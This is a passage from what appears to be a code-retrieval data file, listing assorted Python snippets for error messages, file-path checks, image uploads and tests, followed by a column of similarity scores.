`error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def _error(self, message):\r\n dlg = wx.MessageDialog(self, message,\r\n 'xmi2magik',\r\n wx.OK | wx.ICON_ERROR\r\n )\r\n dlg.ShowModal()\r\n dlg.Destroy()", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def init_error_files(self): \n \n dir_path = self.init_logs_directory()\n log_errors = self.join_path(dir_path, PATH_FOR_LOG_ERRORS)\n \n return log_errors", "def __init__(\n self,\n img_path: Union[str, \"Path\"],\n profile: dict,\n crop_size: int,\n padding: int = 0,\n **kwargs\n ):\n super().__init__()\n self.img_path = img_path\n self.crop_size = crop_size\n self.padding = padding\n\n profile.update(blockxsize=crop_size, blockysize=crop_size, tiled=True, **kwargs)\n\n # Create the file and get the indices of write locations\n with rasterio.open(self.img_path, \"w\", **profile) as dst:\n self.height = dst.height\n self.width = dst.width\n self.profile = dst.profile\n\n _y0s = range(0, self.height, self.crop_size)\n _x0s = range(0, self.width, self.crop_size)\n self.y0x0 = list(itertools.product(_y0s, _x0s))", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def profile_pic(self, client_file_storage):\n\n # If we already have a profile picture, remove it\n if self.profile_pic_filename:\n filepath = os.path.join(\n current_app.config['UPLOADED_IMAGES_DEST'],\n self.profile_pic_filename)\n os.remove(filepath)\n self.profile_pic_filename = None\n self.profile_pic_url = None\n\n # This uploads & saves the file on the server\n # NOTE: It uses the secure_filename function...\n server_filename = images.save(client_file_storage)\n\n # Generate the URL to this file\n url = images.url(server_filename)\n\n # Store information with the user\n self.profile_pic_filename = server_filename\n self.profile_pic_url = url", "def profile_upload_path(instance, filename):\n return f'profile/{instance.user.id}/{filename}'", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def test_profile_phone_number_exceptions(self, bad_number):\n with mute_signals(post_save):\n profile = ExamProfileFactory(profile__phone_number=bad_number)\n with self.assertRaises(InvalidProfileDataException):\n CDDWriter.profile_phone_number_to_raw_number(profile)\n with self.assertRaises(InvalidProfileDataException):\n CDDWriter.profile_phone_number_to_country_code(profile)", "def _validate_path(self, key, path):\n if path is None:\n raise TypeError(\"FileLink.path can not be None\")\n \n if not isinstance(path, (str, unicode)):\n raise TypeError(\"FileLink.path should be a str or unicode, \"\n \"not %s\" % path.__class__.__name__)\n return path", "def test_get_predefined_config_path_framework_failure(self) -> None:\n with self.assertRaises(Exception):\n get_predefined_config_path(\n framework=\"onnx\",\n domain=\"image_recognition\",\n )", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def __init__(self, filepath='./data/image_clean_pat.npy'):\n self.filepath = filepath\n assert '.npy' in filepath\n if not os.path.exists(filepath):\n print(\"[!] 
Data file not exists\")\n sys.exit(1)", "def test_invalid_image_extensions(self):\n with open('apps/upload/tests/media/test_invalid.ext', 'rb') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(400, r.status_code)\n json_r = json.loads(r.content)\n eq_('error', json_r['status'])\n eq_('Invalid or no image received.', json_r['message'])\n eq_('Please upload an image with one of the following extensions: '\n 'jpg, jpeg, png, gif.', json_r['errors']['__all__'][0])", "def __init__(self, status: str, info=\"\", error=\"\", image=None, sound=None, url=None):\n self._status = status\n self._info = info\n self._error = error\n self._image = image\n self._sound = sound\n self._url = url\n\n if not isinstance(status, str):\n raise TypeError(\"status must be a string\")\n if not isinstance(info, str):\n raise TypeError(\"info must be a string\")\n if not isinstance(error, str):\n raise TypeError(\"error must be a string\")\n if status not in MokadiInfo._allowed_status:\n raise ValueError(\"status must be in {0}\".format(\n MokadiInfo._allowed_status))\n if image is not None and len(image) > 0:\n if not image.startswith(\"http\") and not os.path.exists(image):\n raise FileNotFoundError(image)\n if sound is not None and len(sound) > 0:\n if not os.path.exists(sound):\n raise FileNotFoundError(sound)", "def _error_resource_callback(self, msg_id, error_message):\n for callback in self._callback['error']:\n callback(error_message)", "def error_message(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"error_message\")", "def error_obj(message):\n return {\n 'error': message,\n 'success': False\n }", "def __validate_location(self):\n if not os.path.exists(self._file_path):\n raise FileNotFoundError(\"Directory does not exist\")\n if not os.path.isfile(self._path_name):\n raise FileNotFoundError('File does not exist')" ]
[ "0.5651921", "0.5624119", "0.56222874", "0.5336274", "0.52178127", "0.52178127", "0.52178127", "0.51103395", "0.5086884", "0.5018844", "0.49850813", "0.49842182", "0.49580494", "0.49038544", "0.49034742", "0.48773718", "0.48606312", "0.48144424", "0.47821972", "0.4751558", "0.47506025", "0.47404906", "0.47377828", "0.47258997", "0.47146899", "0.47123206", "0.4692803", "0.46895164", "0.46662524", "0.46537906", "0.46463123", "0.46392834", "0.4621368", "0.461716", "0.46167812", "0.4604825", "0.45985237", "0.45870885", "0.45798782", "0.45783862", "0.45754635", "0.45694822", "0.45621186", "0.4556185", "0.45554483", "0.45450053", "0.45443705", "0.4523275", "0.4521774", "0.45130208", "0.45071214", "0.44996825", "0.44924122", "0.44919372", "0.4476653", "0.44689408", "0.44611457", "0.44609773", "0.44558406", "0.44545683", "0.4451842", "0.4448196", "0.44464883", "0.4446142", "0.44409156", "0.44404247", "0.44377464", "0.44295344", "0.44262445", "0.44252706", "0.44251063", "0.4411185", "0.44090632", "0.44073534", "0.44054517", "0.44038668", "0.43926015", "0.43915418", "0.43891475", "0.43797415", "0.4376479", "0.43758586", "0.43654388", "0.4359844", "0.43399394", "0.4333495", "0.43246096", "0.43157473", "0.43107846", "0.43052602", "0.4283513", "0.42833996", "0.42783722", "0.42778176", "0.4276017", "0.42716137", "0.42714792", "0.4270669", "0.42680633", "0.4267554", "0.42673653" ]
0.0
-1
Initializes InvalidTweetText with an error message.
def __init__(self, msg):
    # Store the error message describing why the tweet text is invalid.
    self.msg = msg
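For context, a minimal sketch of how such an exception might be defined in full and then raised; the Exception base class, the check_tweet_text helper, and the 280-character limit are illustrative assumptions, not taken from the snippet above.

class InvalidTweetText(Exception):
    """Raised when a tweet's text fails validation (sketch; base class is assumed)."""

    def __init__(self, msg):
        self.msg = msg
        super().__init__(msg)  # so str(exc) also carries the message


def check_tweet_text(text):
    # Hypothetical helper: the empty-text check and the 280-character limit
    # are assumptions for illustration only.
    if not text:
        raise InvalidTweetText("Empty text")
    if len(text) > 280:
        raise InvalidTweetText("Too long")
    return text


try:
    check_tweet_text("")
except InvalidTweetText as exc:
    print(exc.msg)  # -> Empty text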
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def set_error(self, code: Optional[int] = None, text: Optional[str] = None) -> None:\n if code is not None:\n self.error_code = code\n if text is not None:\n self.error_text = text", "def tweet_invalid(self):\r\n\r\n valid = True # optimism\r\n validation_error = None\r\n\r\n if not self.tweet_length():\r\n valid, validation_error = False, 'Empty text'\r\n\r\n if self.tweet_length() > MAX_LENGTH:\r\n valid, validation_error = False, 'Too long'\r\n\r\n if re.search(ur''.join(REGEXEN['invalid_control_characters']), self.text):\r\n valid, validation_error = False, 'Invalid characters'\r\n \r\n if self.parent and hasattr(self.parent, 'tweet_is_valid'):\r\n self.parent.tweet_is_valid = valid\r\n if self.parent and hasattr(self.parent, 'tweet_validation_error'):\r\n self.parent.tweet_validation_error = validation_error\r\n\r\n return validation_error if not valid else False", "def __init__(self, message, code, *args):\n self.message = message\n self.code = code\n super(TwitterException, self).__init__(message, code, *args)", "def __init__(self, text: Union[str, Text, None] = None):\n if isinstance(text, str):\n text = TNTParser().parse(text)\n if text is not None:\n self.text = text", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def set_text(self, tweet):\n\n if not tweet.has_key('text'):\n return\n\n text = tweet['text']\n\n # remove URIs\n text = re.sub(self.re_uri,\"\", text)\n # lower case string and remove non word characters\n text = re.sub(self.re_non_word, \" \", text.lower()).strip()\n\n self.text = text", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def error(self, text, info=None):\n self.details[\"message\"] = text\n if info:\n self.details[\"details\"] = info", "def on_init_fail(self, event_time, message):\n pass", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(self, text):\n\n self.text = text", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? 
I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def __init__(self, text):\n self.text = text", "def __init__(self, text):\n self.text = text", "def text(self, text):\n if text is None:\n raise ValueError(\"Invalid value for `text`, must not be `None`\")\n\n self._text = text", "def __init__(self, text=None, settings=None, style='General', language='en'):\n\n self._text = None\n self._settings = None\n self._style = None\n self._language = None\n\n self.text = text\n self.settings = settings\n self.style = style\n self.language = language", "def __init__(self,\n text: str) -> None:\n\n super().__init__(text)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def __init__(self, source_text, syntax_error_ctor):\n self.src = source_text\n self.syntax_error_ctor = syntax_error_ctor", "def __init__(self, message, repl):\n super(LinterFailure, self).__init__()\n self.message = message\n self.replacement = repl", "def test_invalid_text_input(self):\n m = Message(\n text=None, user_id=self.uid\n )\n db.session.add(m)\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()", "def message_text(self, message_text):\n\n self._message_text = message_text", "def validate(self, text: Union[str, Text, None] = None) -> None:\n text = text or self.text\n if isinstance(text, str):\n text = TNTParser().parse(text)\n if text is not None:\n self.text = text\n try:\n for i, (lineno, line) in enumerate(text.items()):\n getattr(self, 'rule_' + line.rule.value\\\n .lower().replace(' ', '_').replace('-', '_'),\n self.rule_invalid)(i, line)\n except ProofMistake as exc:\n exc.args = (f\"line {line.lineno}: '{str(line)}' \" + exc.args[0], *exc.args[1:])\n raise", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def init_text(self):\n d = self.declaration\n if d.text:\n self.set_text(d.text)\n if d.text_color:\n 
self.set_text_color(d.text_color)\n if d.text_alignment:\n self.set_text_alignment(d.text_alignment)\n if d.font_family or d.text_size:\n self.refresh_font()\n if hasattr(d, 'max_lines') and d.max_lines:\n self.set_max_lines(d.max_lines)", "def __init__(self, text=None, fact_id=None, fact_type=None, image_url=None,\n tts_url=None):\n self.id = fact_id or str(uuid4()).replace('-', '')\n self.text = text\n self.type = fact_type or 'TEXT'\n self.image_url = image_url\n self.tts_url = tts_url", "def set_error(self, error):\n self._set_sub_text('error', text=str(error))\n return self", "def __init__(self, tweet_json):\r\n self.tweet = tweet_json\r\n self.date = datetime.datetime.strptime(self.tweet[\"date\"], \"%Y-%m-%dT%H:%M:%S.000Z\")\r\n self.processed = False\r\n self.max_importance = 0\r\n try:\r\n text = re.sub(self.tweet[\"keywords\"][0], '', self.tweet[\"text\"])\r\n except IndexError:\r\n text = self.tweet[\"text\"]\r\n try:\r\n self.language = polyglot.detect.Detector(re.sub('#', '', text)).language.name\r\n except polyglot.detect.base.UnknownLanguage as e:\r\n self.language = \"mixed\"\r\n except:\r\n self.language = polyglot.detect.Detector(''.join([i if ord(i) < 128 else ' ' for i in text])).language.name", "def __init__(self, msg):\n\n super(HTTPError, self).__init__(msg)\n self.msg = msg", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self):\n self.message = \"No task found with the given string.\"", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def __init__(self, message, code=None):\n WebSocketError.__init__(self, message)\n self.code = code", "def _get_error_text(self, result: dict) -> str:\n try:\n return result[self._FIELD_TEXT]\n except KeyError:\n return self._DEFAULT_ERROR_MSG", "def verify_text_present(self, text, msg=None):\r\n try:\r\n self.assert_text_present(text, msg)\r\n except AssertionError, e:\r\n if msg:\r\n m = \"%s:\\n%s\" % (msg, str(e))\r\n else:\r\n m = str(e)\r\n self.verification_erorrs.append(m)", "def _validate_text(self, text):\n if text is None:\n return\n if not (0 < len(text) <= self.TEXT_MAX):\n raise ValidationError", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one 
uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def __init__(self):\n self.message = \"Invalid time zone string, choose one from https://stackoverflow.com/questions/13866926/is-there-a-list-of-pytz-timezones.\"", "def __init__(self, text: Optional[str] = None, special_end_token: Optional[str] = None):\n super().__init__()\n text = text or PADDING_TEXT\n self.text_tokens = text.split()\n if special_end_token is not None:\n self.text_tokens.append(special_end_token)\n self.text_len = len(self.text_tokens)", "def error(text, window=None):\n message(text, u'Erro', M_ERROR, B_OK, window)", "def error(self, msg):\n with self._lock:\n self.wraptext(msg, fg=\"red\", bold=True)\n return self", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def __throw_exception(self, text):\n raise Exception(text)", "def __init__(self, tweet_data):\n _hashtags = tweet_data['entities']['hashtags']\n _str_date = tweet_data['created_at']\n self.account = Account(tweet_data['user'])\n self.date = self.format_date(_str_date)\n self.hashtags = [\"#%s\" % (tag['text']) for tag in _hashtags]\n self.likes = tweet_data['favorite_count']\n # Note: replies number is only available with\n # the Premium and Enterprise tier products.\n # https://developer.twitter.com/en/docs/tweets/data-dictionary/overview/tweet-object # noqa\n self.replies = 0\n self.retweets = tweet_data['retweet_count']\n self.text = tweet_data['text']", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def fail(self, text: str = \"FAIL\") -> None:\n _text = text if text else \"FAIL\"\n self._freeze(_text)", "def errMsg(self, code, text):\n # Preprocess text\n lines = text.splitlines()\n\n image = self.errMsgImage.copy()\n draw = ImageDraw.Draw(image)\n # Text\n x0 = self.width/4 + 2\n y0 = -1\n draw.text((x0, y0), 'ERROR {:5d}'.format(code), font=self.font, fill=255)\n for i in range(0,len(lines)):\n draw.text((x0, y0 + (i+1)*7), lines[i], font=self.font, fill=255)\n self.disp.image(image.rotate(180))\n self.disp.display()\n return", "def load_text(self, encoding='utf8', encoding_errors='ignore'):\n log.error('Cannot load: %s', self.file_name)", "def __init__(self):\n self.message = \"No stop found with the given string.\"", "def __init__(__self__, *,\n error_code: int,\n error_message: str,\n exception_message: str,\n recommended_action: str):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", 
error_message)\n pulumi.set(__self__, \"exception_message\", exception_message)\n pulumi.set(__self__, \"recommended_action\", recommended_action)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def on_error(self, status_code, data):\n logging.warning(\"Error recieving tweet: {0}\".format(status_code))", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def text(self, text):\n if text is None:\n raise ValueError(\"Invalid value for `text`, must not be `None`\") # noqa: E501\n\n self._text = text", "def __parse_error(self, text):\n m = self.__size_expr.match(text)\n if m is not None:\n self.errcode = b\"\"\n self.errmsg = self.__read_block(int(m.group(1)) + 2)\n return\n\n m = self.__error_expr.match(text)\n if m is None:\n raise Error(\"Bad error message\")\n if m.group(1) is not None:\n self.errcode = m.group(1).strip(b\"()\")\n else:\n self.errcode = b\"\"\n self.errmsg = m.group(2).strip(b'\"')", "def __init__(self, errors):\n strerrors = \"\\n - \".join(errors)\n text = tr(\n \"Application error occurred on secondary appliance. \"\n \"Please read logs on the secondary appliance.\"\n )\n HAError.__init__(\n self,\n SECONDARY_FAILED_TO_APPLY,\n \"%s\\n - %s\" % (text, strerrors)\n )", "def __init__(self, reason, errorcode=None, cause=None):\n super().__init__(reason)\n if cause is not None and isinstance(cause, TGException):\n if errorcode is None:\n errorcode = cause.errorcode\n self._errorcode = errorcode\n self._cause = cause", "def error(self, message, code='UnknownError', error_code=None, http_status=400):\n\n # Some backwards compatibility\n if error_code is not None and code == 'UnknownError':\n code = error_code\n\n self._add_message( message, self.ERROR, code=code )\n self.n_errors += 1\n self.status = 'ERROR'\n self.http_status = http_status\n self.error_code = code\n self.message = message", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def text(self, text):\n if self.local_vars_configuration.client_side_validation and text is None: # noqa: E501\n raise ValueError(\"Invalid value for `text`, must not be `None`\") # noqa: E501\n\n self._text = text", "def __init__(\n self,\n type,\n text):\n self.type = type\n self.text = text", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def __init__(self, module, message, _type, exc_message=None, *args, **kwargs):\n 
logger.error(\"[{}] {} {} {}\".format(module,\n _type,\n '<{}>'.format(exc_message) if exc_message else '',\n message))\n super(CliException, self).__init__(message, *args)\n self.message = message\n self.type = _type\n self.exc_message = exc_message\n self.str_at_error = kwargs.get('str_at_error', None)", "def __init__(\n self,\n *,\n text: Union[str, dict, TextObject],\n action_id: Optional[str] = None,\n url: Optional[str] = None,\n value: Optional[str] = None,\n style: Optional[str] = None, # primary, danger\n confirm: Optional[Union[dict, ConfirmObject]] = None,\n **others: dict,\n ):\n super().__init__(action_id=action_id, type=self.type)\n show_unknown_key_warning(self, others)\n\n # NOTE: default_type=PlainTextObject.type here is only for backward-compatibility with version 2.5.0\n self.text = TextObject.parse(text, default_type=PlainTextObject.type)\n self.url = url\n self.value = value\n self.style = style\n self.confirm = ConfirmObject.parse(confirm)", "def place_error_message(self, message):\n msg = tk.Message(self.parent, text='Error: ' + message)\n msg.config(bg='white', font=('times', 18, 'bold'))\n msg.pack()", "def add_error(self, err_msg):\n assert err_msg is not None, 'err_msg cannot be None'\n\n self.error_found = True\n self.error_message = err_msg.strip()", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def SetText(self, text):\r\n\r\n self._text = text\r\n return self", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def __init__(self, error_msg):\n super(RequestTimeoutException, self).__init__(error_msg)", "def __init__(self, string, stem=None, stemmer=None):\n self.string = string\n self.stem = stem or self._get_stem(string)\n self.stemmer = stemmer or SnowballStemmer('lang')", "def __init__ (self, *args, **kw):\n if 0 == len(args) and 'message' in kw:\n args = (kw.pop('message'),)\n self._args = args\n self._kw = kw\n super(PyXBException, self).__init__(*args)", "def _set_text(self, text):\n if not self.has_textframe:\n raise TypeError(\"cannot set text of shape with no text frame\")\n self.textframe.text = _to_unicode(text)", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def _error(self, token, msg):\n self._interpreter.parse_error(token, msg)\n return ParseError()", "def verify_text(self, text):\n pass", "def _set_text(self, text):\n self.clear()\n r = self.add_run()\n r.text = _to_unicode(text)", "def test_TSE_common(self):\n\n regexpr = re.compile(r'^Error [0-9]{4}: [\\w :-]+$')\n for code in TwitterSearchException._error_codes:\n self.assertTrue( regexpr.match( str(TwitterSearchException(code)) ), \"Odd string patterns detected\")\n\n foo = \"someString\"\n tse = \"%s\" % TwitterSearchException(2000,foo)\n self.assertTrue( regexpr.match(tse) and tse[len(foo)*-1:] == foo )", "def handle_exceptions(self: T, message: str, error: str) -> SpinnerContext[T]:\n return SpinnerContext(self, message, error)", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def SetText(self, text):\r\n\r\n self._text = text", "def settext(self, text):\n self.__text = text\n self.__nonzero = True", "def _initilize_message(self):\n\n message_label = ttk.Label(\n self._frame, text=\"Are you sure you want to delete this recipe?\")\n\n message_label.grid(row=0, column=0, 
columnspan=2, padx=5, pady=5)" ]
[ "0.6875406", "0.5868215", "0.5819681", "0.5728066", "0.562525", "0.55098635", "0.5487254", "0.54616547", "0.54316974", "0.5398727", "0.5387163", "0.5380475", "0.53396827", "0.53311336", "0.5290807", "0.52907974", "0.52791065", "0.525219", "0.525219", "0.5239347", "0.5238812", "0.52372146", "0.5201669", "0.51927084", "0.5191051", "0.51889", "0.51854956", "0.51754236", "0.51733637", "0.51723367", "0.51692367", "0.51481074", "0.5139778", "0.5137769", "0.51197815", "0.5065726", "0.50601673", "0.50535756", "0.50470006", "0.50400496", "0.50283813", "0.5026794", "0.50266993", "0.5006119", "0.4982496", "0.49793607", "0.49783534", "0.4964407", "0.49525705", "0.4945455", "0.49412706", "0.49388516", "0.49374396", "0.49373418", "0.49272358", "0.4916769", "0.49078768", "0.48741645", "0.48588932", "0.4846337", "0.4845869", "0.48413804", "0.48368523", "0.48282316", "0.48280966", "0.48278052", "0.4825061", "0.48211345", "0.48197484", "0.48155582", "0.4796017", "0.47929797", "0.47883913", "0.47761", "0.47714072", "0.47641915", "0.47640818", "0.47636464", "0.4763416", "0.47570258", "0.47563538", "0.47507712", "0.47368398", "0.47340328", "0.47337395", "0.4730454", "0.4723032", "0.4721987", "0.47101364", "0.47035307", "0.4700501", "0.469256", "0.46911222", "0.46856105", "0.46784776", "0.46758917", "0.46748072", "0.46683842", "0.46601853", "0.46565896", "0.46511483" ]
0.0
-1
Performs the scaled all_reduce operation on the provided tensors. The input tensors are modified in-place. Currently supports only the sum reduction operator. The reduced values are scaled by the inverse size of the process group.
from typing import List

import torch
import torch.distributed
from torch import Tensor


def scaled_all_reduce(tensors: List[Tensor], num_gpus: int) -> List[Tensor]:
    # There is no need for reduction in the single-proc case
    if num_gpus == 1:
        return tensors
    # Queue the reductions
    reductions = []
    for tensor in tensors:
        reduction = torch.distributed.all_reduce(tensor, async_op=True)
        reductions.append(reduction)
    # Wait for reductions to finish
    for reduction in reductions:
        reduction.wait()
    # Scale the results
    for tensor in tensors:
        tensor.mul_(1.0 / num_gpus)
    return tensors
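A hedged usage sketch: averaging per-rank metric tensors during distributed training. It assumes torch.distributed has already been initialized (e.g. via init_process_group), and the metric names sync_metrics, loss, and top1_err are purely illustrative.

import torch.distributed as dist

def sync_metrics(loss, top1_err):
    # Assumes dist.init_process_group(...) was called earlier and that the
    # tensors already live on this rank's device.
    num_gpus = dist.get_world_size()
    # scaled_all_reduce sums each tensor across ranks, then scales by
    # 1 / num_gpus, i.e. it yields the mean over all processes (in-place).
    loss, top1_err = scaled_all_reduce([loss, top1_err], num_gpus)
    return loss.item(), top1_err.item()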
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def allreduce_hook(state: AllReduceState, grad: torch.Tensor):\n if state.gradient_predivide_factor > 1:\n grad.div_(state.gradient_predivide_factor)\n dist.all_reduce(grad, group=state.process_group)\n if state.gradient_postdivide_factor > 1:\n grad.div_(state.gradient_postdivide_factor)", "def reduce(tensor, reduction=\"mean\"):\n\n def _reduce_across_processes(tensor, reduction=\"mean\"):\n state = PartialState()\n cloned_tensor = tensor.clone()\n if state.distributed_type == DistributedType.NO:\n return cloned_tensor\n if state.distributed_type == DistributedType.TPU:\n xm.all_reduce(\"sum\", cloned_tensor)\n elif state.distributed_type.value in TORCH_DISTRIBUTED_OPERATION_TYPES:\n torch.distributed.all_reduce(cloned_tensor, ReduceOp.SUM)\n if reduction == \"mean\":\n cloned_tensor /= state.num_processes\n return cloned_tensor\n\n return recursively_apply(_reduce_across_processes, tensor, error_on_other_type=True, reduction=reduction)", "def _reduce(self, values):\n\n if self.dim is None:\n return values\n\n if isinstance(self.dim, str):\n dim = [self.dim]\n else:\n dim = self.dim\n\n if self.reduce_func is None:\n for d in values.dims:\n if d not in dim:\n values = values.isel(**{d: 0})\n return values\n else:\n other_dims = [d for d in values.dims if d not in dim]\n return values.reduce(self.reduce_func, dim=other_dims)", "def all_reduce(self, world_size):\n if world_size == 1:\n return\n self.partials = defaultdict(float,\n all_reduce_cpu_scalars(self.partials))\n for k, v in self.partials.items():\n if self.accum_reductions[k] in ('mean', 'last'):\n self.partial_counts[k] *= (world_size - self.partials.get('ignore', 0))\n if self.partials.get('ignore', 0) > 0:\n assert self.accum_reductions[k] == 'mean'\n print_once(f'reducing with world size {world_size - self.partials.get(\"ignore\", 0)}')", "def apply_flattened_call_all(tensors, call):\n\n grouped_tensors = _group_by_tensor_type(tensors)\n for tensors in grouped_tensors.values():\n apply_flattened_call(tensors, call)", "def all_reduce_dict(py_dict, op='sum', group=None, to_float=True):\n _, world_size = get_dist_info()\n if world_size == 1:\n return py_dict\n if group is None:\n # TODO: May try not to use gloo in the future\n group = _get_global_gloo_group()\n if dist.get_world_size(group) == 1:\n return py_dict\n\n # all reduce logic across different devices.\n py_key = list(py_dict.keys())\n py_key_tensor = obj2tensor(py_key)\n dist.broadcast(py_key_tensor, src=0)\n py_key = tensor2obj(py_key_tensor)\n\n tensor_shapes = [py_dict[k].shape for k in py_key]\n tensor_numels = [py_dict[k].numel() for k in py_key]\n\n if to_float:\n flatten_tensor = torch.cat(\n [py_dict[k].flatten().float() for k in py_key])\n else:\n flatten_tensor = 